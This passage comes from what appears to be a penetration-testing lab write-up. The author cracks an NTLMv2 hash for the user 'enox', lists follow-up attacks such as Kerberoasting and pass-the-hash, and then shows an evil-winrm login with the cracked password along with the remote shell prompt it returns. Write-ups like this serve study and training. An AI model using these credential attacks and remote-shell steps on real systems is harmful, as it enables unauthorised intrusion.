Exploitation

Cracked the NTLMv2 hash for enox. I am going to first try: Kerberoasting, AS-REP roasting, PtH on all services I can, RDP, see SMB shares, WinRM, rpcclient, maybe ldapsearch will work now.

Evil-WinRM was the way in.

evil-winrm -i 192.168.105.165 -u 'enox' -p 'california'    

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\enox\Documents> 
